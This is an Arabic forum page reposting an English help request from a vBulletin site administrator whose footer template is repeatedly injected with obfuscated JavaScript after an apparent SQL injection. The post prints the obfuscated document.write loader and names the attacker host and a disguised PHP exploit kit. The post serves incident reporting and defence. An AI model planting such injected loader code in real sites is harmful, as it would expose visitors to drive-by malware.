vBulletin Footer SQL Injection Hack - منتدى استراحات زايد

استراحات زايد الصفحة الرئيسية

		منتدى استراحات زايد > استراحات اخرى > منتدى أخبار المواقع والمنتديات العربية والأجنبية
vBulletin Footer SQL Injection Hack

التسجيل

التعليمـــات

المجموعات الإجتماعية

اجعل كافة الأقسام مقروءة

:: تركيب مظلات خارجية للحوش في الطائف والباحة | مظلات الطائف 0556109470 (آخر رد :ksa ads) :: قهوجي في جدة - خدمة تقديم ضيافه للمناسبات والحفلات 0552137702 (آخر رد :ksa ads) :: خدمات الشحن إلى مصر من الرياض: الحل الأمثل لاحتياجاتك اللوجستية (آخر رد :عمران بحر) :: تركيب ساندوتش بانل في الرياض – أفضل مقاول تركيب متخصص 0563866945 (آخر رد :ksa ads) :: مستودعات ساندوتش بانل في الرياض |تركيب وتوريد سندوتش بنل 0551033861 (آخر رد :ksa ads) :: مساج ابها منزلى وفندقي 0565212890 (آخر رد :رودى طه) :: مساج منزلى جدة 0506485206 (آخر رد :رودى طه) :: مقاول سفلتة في المنطقة الشرقية 0506291462 (آخر رد :ksa ads) :: منصة مدونتي لتقديم محتوى موثوق ومفيد في مجالات متعددة (آخر رد :عمران بحر) :: كيف يساعدك مستعلم على الوصول إلى أفضل المراكز الطبية في الخليج ومصر والوطن العربي (آخر رد :pramgnet)

LinkBack

أدوات الموضوع

انواع عرض الموضوع

01-23-2010, 10:10 PM

محروم.كوم

عضو ماسي

بيانات محروم.كوم

رقم العضوية : 503

تاريخ التسجيل : Dec 2007

الجنس : female

علم الدوله : الدوله : United Arab Emirates

المشاركات : 2,100,669

عدد الـنقاط :3341

تقييم المستوى : 2140

vBulletin Footer SQL Injection Hack

Greetings,

Over the last couple days our site has been targeted with what appears to be some sort of SQL injection attack. When this occurs, the following code is appended to the footer template:

PHP Code:
var _0x110261= ["\\x77\\x72\\x69\\x74\\x65\"]; var aBBcB=document; var ccccc = ''; var BBBcB = ccccc.replace(/XLMS9Q21/g,\"s\"); var ccBBB = BBBcB.replace(/LSM21ghk8/g,\"o\"); var cBcBc = ccBBB.replace(/JQ21KL#AZ/g,\"e\");aBBcB[_0x110261[0]](unescape(cBcBc));

This is very similar in form to the vBSEO injection hack that was reported fixed a while ago, though referencing "img121.imagehacks.info" instead of centiyo.com. To that end, we immediately upgraded vBSEO to version 3.3.2 (we were running version 3.2 previously). vBulletin itself is and was running version 3.8.4 PL2. However, we are continuing to see this code embedded on the site.

Downloading the header.jpeg file referenced in the iframe and opening it in Notepad shows it to be a PHP script called "Egypack 1.0". The only other incident we could find through google is located at http://pastebin.com/m1f3a6c27 and is in spanish. It also occurred within the last couple of days, and targetted a Wordpress site (as did the original centiyo.com injection). However, unlike the centiyo.com incident, we are unable to locate any remaining scripts that could be re-populating the injection.

Any help or suggestions would be greatly appreciated. __DEFINE_LIKE_SHARE__

إعلانات عشوائية

تعارف بلاك بيري	صور بلاك بيري	قروبات بلاك بيري	اخبار رياضية	العاب فلاش	اهداءات اغاني للهواتف	نغمات جوال
أغاني	مسلسلات رمضان	مسجات	سوق محروم	سيارات للبيع	ارقام سيارات للبيع	برودكاست

مواقع النشر (المفضلة)

« حصريا اللعبه الرائعه The Sims 3: World Adventures | أول تدوينة مصغرة عبر تويتر من الفضاء »

أدوات الموضوع
مشاهدة صفحة طباعة الموضوع أرسل هذا الموضوع إلى صديق
انواع عرض الموضوع
الانتقال إلى العرض العادي الانتقال إلى العرض المتطور العرض الشجري